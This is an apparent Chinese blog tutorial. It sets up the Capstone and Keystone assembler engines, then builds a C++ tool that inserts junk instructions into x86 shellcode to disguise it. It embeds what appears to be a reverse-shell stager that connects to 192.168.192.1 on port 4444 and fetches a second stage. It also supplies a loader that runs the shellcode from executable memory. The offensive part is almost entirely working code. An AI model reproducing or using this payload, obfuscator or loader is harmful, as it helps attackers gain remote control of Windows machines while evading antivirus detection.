0.简介
汇编和反汇编的过程,就是硬编码(二进制机器码)和汇编指令之间的相互转化。最直白的方式,就是直接查intel的白皮书,具体转换方法可以参考《二进制入门学习笔记-14.windows硬编码》。自己翻手册实现这个过程显然很繁琐,不过好在已经有Keystone
和Capstone
两大神器实现了需求。
- Capstone:目前世界上最优秀的反汇编引擎,ida工具都是使用的该反汇编引擎。可以快速将硬编码转换为汇编语句。详情见Capstone官网
- Keystone:开源的轻量级多平台、多架构汇编框架,可以实现从汇编语句转换为硬编码。详情见Keystone官网
1.开发环境配置
所用编辑器为Microsoft Visual Studio2019,操作系统为Win10 X64。
1.1 Capstone开发环境
Capstone安装非常简单,Github仓库中选取所需要release版本即可,这里我下载的是64位版本的。解压完成后即可看到如下文件:
这里的lib文件和dll文件是可以直接在我目前的开发环境下使用。include
文件夹中包含的capstone
文件夹中,还有开发时所需要的头文件。我这里使用的静态链接库开发,开发时只需将capstone.lib
及include/capstone
文件夹拖入项目并导入即可。
1.2 Keystone开发环境
Keystone官方提供的版本编译环境较为老旧,无法在当前环境下使用。需要自己重新编译,下载源码包并解压。这里我想要编译x64的lib,因此使用x64 Native Tools Command Prompt for VS 2019
进行编译。
编译方法如下:
cd C:\Users\crls\Desktop\keystone-0.9.1 mkdir build cd build ..\nmake-lib.bat
编译完成后会在build\llvm\lib
目录下生成keystone.lib
文件。
使用时,将该keystone.lib
文件和/include/
目录下的keystone
目录均复制到项目文件夹并导入即可。
1.3 测试开发环境
新建一个空项目,并导入所需的lib库和头文件。 主文件中写入如下代码:
#include <iostream> #include <stdio.h> #include <cinttypes> #include "capstone/capstone.h" #include "keystone/keystone.h" using namespace std; #define CODE1 "\x41\x4a\xb8\x78\x56\x34\x12" #define CODE2 "INC ecx; DEC edx;mov eax,0x12345678" void testCapstone(void) { csh handle; cs_insn* insn; size_t count; if (cs_open(CS_ARCH_X86, CS_MODE_32, &handle)) { printf("ERROR: Failed to initialize engine!\n"); } count = cs_disasm(handle, (unsigned char*)CODE1, sizeof(CODE1) - 1, 0x1000, 0, &insn); if (count) { size_t j; for (j = 0; j < count; j++) { printf("0x%""Ix"":\t%s\t\t%s\n", insn[j].address, insn[j].mnemonic, insn[j].op_str); } cs_free(insn, count); } else printf("ERROR: Failed to disassemble given code!\n"); cs_close(&handle); } void testKeystone(void) { ks_engine* ks; ks_err err; size_t count; unsigned char* encode; size_t size; err = ks_open(KS_ARCH_X86, KS_MODE_32, &ks); if (err != KS_ERR_OK) { printf("ERROR: failed on ks_open(), quit\n"); } if (ks_asm(ks, CODE2, 0, &encode, &size, &count) != KS_ERR_OK) { printf("ERROR: ks_asm() failed & count = %lu, error = %u\n", count, ks_errno(ks)); } else { size_t i; printf("%s = ", CODE2); for (i = 0; i < size; i++) { printf("%02x ", encode[i]); } printf("\n"); printf("Compiled: %lu bytes, statements: %lu\n", size, count); } // NOTE: free encode after usage to avoid leaking memory ks_free(encode); // close Keystone instance when done ks_close(ks); } int main(int argc, char** argv) { printf("------------Capstone测试结果------------\n"); testCapstone(); printf("------------Capstone测试结果------------\n"); printf("\n\n"); printf("------------Keystone测试结果------------\n"); testKeystone(); printf("------------Keystone测试结果------------\n"); }
运行结果如下:
2.实现代码
以下代码参考了别人Python版本的思路。先把shellcode转换成字符串形式的汇编指令。然后遍历每一条汇编指令,给每一个跳转点都起上名字,通过这个名字进行跳转。然后添加花指令,再使用keystone将字符串形式的汇编指令转换成shellcode。
#include <iostream> #include <stdio.h> #include <cinttypes> #include "capstone/capstone.h" #include "keystone/keystone.h" #include <string.h> using namespace std; string getOpCodeFromAssemblyCode(string assemblyCode) { string res; ks_engine* ks; ks_err err; size_t count; unsigned char* encode; size_t size; err = ks_open(KS_ARCH_X86, KS_MODE_32, &ks); if (err != KS_ERR_OK) { printf("ERROR: failed on ks_open(), quit\n"); } if (ks_asm(ks, assemblyCode.data(), 0, &encode, &size, &count) != KS_ERR_OK) { printf("ERROR: ks_asm() failed & count = %lu, error = %u\n", count, ks_errno(ks)); } else { size_t i; for (i = 0; i < size; i++) { char szTmp[3]; sprintf_s(szTmp, "%02x", encode[i]); res += "\\x"; res += szTmp; //printf("\\x%02x", encode[i]); } //printf("\n"); //printf("Compiled: %lu bytes, statements: %lu\n", size, count); ks_free(encode); ks_close(ks); return res; } } int offSetToIndex(int offset, int assemblyCodeLength, int opCodeLenArray[]) { int index = 0; //printf("assemblyCodeLength:%d\n",assemblyCodeLength); for (int i = 0; i < assemblyCodeLength;i++) { //cout << i << " : offset: " << offset << "insn[i].size: "<< opCodeLenArray[i]<<endl; offset = offset - opCodeLenArray[i]; index += 1; if (offset == 0) { return index; } } } void addThunkCode(char CODE1[], int codeLen, string tunkCode) { string controlflow[] = { "jmp", "jz", "jnz", "je", "jne", "call", "jl", "ja", "loop", "jecxz", "jle", "jge", "jg", "jp", "jnl" }; string registers[] = { "eax", "ecx","edx", "ebx", "esp", "ebp", "esi", "edi" }; string assemblyCodeArray[4000];//存储汇编代码 int opCodeLenArray[4000];//存储每条汇编指令opcode的长度 int assemblyCodeWithControlflow[4000];//存储包含控制流的汇编代码编号 int numOfAssemblyCodeWithControlflow = 0; int numOfassemblyCodeToJumpTo = 0; int assemblyCodeToJumpTo[4000]; size_t assemblyCodeLength=0; /*---获取反汇编结果数组assemblyCodeArray---*/ csh handle; cs_insn* insn; if (cs_open(CS_ARCH_X86, CS_MODE_32, &handle)) { printf("ERROR: Failed to initialize engine!\n"); } cs_option(handle, CS_OPT_SKIPDATA, CS_OPT_ON);//跳过数据 assemblyCodeLength = cs_disasm(handle, (unsigned char*)CODE1, codeLen - 1, 0x0, 0, &insn); if (assemblyCodeLength) { for (size_t i = 0; i < assemblyCodeLength; i++) { /* printf("0x%""Ix"":\t%s\t\t%s\t", insn[i].address, insn[i].mnemonic, insn[i].op_str); for (int k = 0; k < insn[i].size; k++) { printf("/x%x", insn[i].bytes[k]); } printf("\n"); */ opCodeLenArray[i] = insn[i].size; assemblyCodeArray[i] = insn[i].mnemonic; assemblyCodeArray[i] += " "; if (strlen(insn[i].op_str)==1) {//防止奇葩情况,如果是一位数没有0x assemblyCodeArray[i] += "0x"; } assemblyCodeArray[i] += insn[i].op_str; } printf("------1.反汇编结果------\n"); for (size_t i = 0; i < assemblyCodeLength; i++) { printf("%d: %s\n", i, assemblyCodeArray[i].data()); } printf("------1.反汇编结果------\n\n\n"); } else { printf("ERROR: Failed to disassemble given code!\n"); } /*获取反汇编结果数组assemblyCodeArray*/ printf("-------查找跳转指令-------\n"); /*获取所有包含跳转但操作数不是寄存器的汇编代码编号*/ for (int i = 0; i < assemblyCodeLength; i++) { bool hasControlflow = false;//保存汇编代码中是否包含跳转代码 bool hasRegisters = false;//保存汇编代码中是否包含寄存器 for (int j = 0; j < (sizeof(controlflow)/sizeof(controlflow[0])); j++) { if (assemblyCodeArray[i].find(controlflow[j])!=-1) { hasControlflow = true; string tmpOpst=insn[i].op_str; for (int k = 0; k < (sizeof(registers) / sizeof(registers[0])); k++) { if (tmpOpst.find(registers[k]) != -1) { hasRegisters = true; } } } } if ((hasControlflow == true) && (hasRegisters == false)) { assemblyCodeWithControlflow[numOfAssemblyCodeWithControlflow] = i; printf("发现第%d行汇编代码中包含跳转指令,汇编代码为:%s\n", assemblyCodeWithControlflow[numOfAssemblyCodeWithControlflow], assemblyCodeArray[i]); numOfAssemblyCodeWithControlflow++; } } printf("-------查找跳转指令-------\n\n"); /*获取所有包含跳转但操作数不是寄存器的汇编代码编号*/ /*给所有被跳转到的位置加上一个名字,并使用名字完成跳转*/ printf("-------对跳转到的位置标签化-------\n"); for (int i = 0; i < numOfAssemblyCodeWithControlflow; i++) { int pos = -1; //0x的位置 int offSet = -1;//原始的偏移 int index = -1; //跳转对应汇编代价的序号 string tmpAssemblyCode; tmpAssemblyCode = assemblyCodeArray[assemblyCodeWithControlflow[i]]; pos = tmpAssemblyCode.find("0x"); offSet = atof(tmpAssemblyCode.substr(pos,tmpAssemblyCode.length()).c_str()); index = offSetToIndex(offSet, assemblyCodeLength, opCodeLenArray); char strIndex[1000];//存储字符串形式的index _itoa_s(index, strIndex, 10); //将跳转位置替换成标签 tmpAssemblyCode = assemblyCodeArray[assemblyCodeWithControlflow[i]].substr(0,pos); tmpAssemblyCode += "jus4fun"; tmpAssemblyCode += strIndex; assemblyCodeArray[assemblyCodeWithControlflow[i]] = tmpAssemblyCode; //判断跳转到的位置是否已经添加标签 bool isAddName = false; for (int j = 0; j < numOfassemblyCodeToJumpTo; j++) { if (assemblyCodeToJumpTo[j] == index) { isAddName = true; } } if (!isAddName) { assemblyCodeToJumpTo[numOfassemblyCodeToJumpTo] = index; string tmpAssemblyCode = "jus4fun"; tmpAssemblyCode += strIndex; tmpAssemblyCode += ": "; tmpAssemblyCode += assemblyCodeArray[index]; assemblyCodeArray[index] = tmpAssemblyCode; printf("对第%d行跳转到的代码进行标签化中,标签化结果为%s\n", index, tmpAssemblyCode.c_str()); numOfassemblyCodeToJumpTo++; } //printf("第%d行的跳转进行标签中,跳转对应代码位置为:%d\n", assemblyCodeWithControlflow[i], index); } printf("已对%d行代码完成标签化\n", numOfassemblyCodeToJumpTo); printf("-------对跳转到的位置标签化-------\n"); /*给所有被跳转到的位置加上一个名字*/ /*添加花指令*/ string assemblyCodeRes; for (size_t i = 0; i < assemblyCodeLength; i++) { assemblyCodeRes += assemblyCodeArray[i]; assemblyCodeRes += ";"; assemblyCodeRes += tunkCode; printf("%d: %s\n", i, assemblyCodeArray[i].data()); } printf("\n\n------添加花指令后的代码汇编代码如下------\n"); printf("%s",assemblyCodeRes.data()); /*添加花指令*/ /*输出加花后的硬编码*/ printf("\n\n------添加花指令后的硬编码如下------\n"); cout << getOpCodeFromAssemblyCode(assemblyCodeRes) << endl; /*输出加花后的硬编码*/ /*释放打开的句柄*/ cs_free(insn, assemblyCodeLength); cs_close(&handle); /*释放打开的句柄*/ } int main(int argc, char** argv) { char CODE1[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\xc0\x01\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"; int codeLen = sizeof(CODE1); string tunkCode = "NOP;"; addThunkCode(CODE1, codeLen, tunkCode); }
使用如下代码对加花前和加花后代码做简单的加载器进行测试:
#include <stdio.h> #include <stdlib.h> #include <windows.h> int main() { char str[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\xc0\x01\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"; void* exec = VirtualAlloc(0,sizeof(str),MEM_COMMIT,PAGE_EXECUTE_READWRITE); memcpy(exec,str,sizeof(str)); ((void(*)())exec)(); }
结果如下: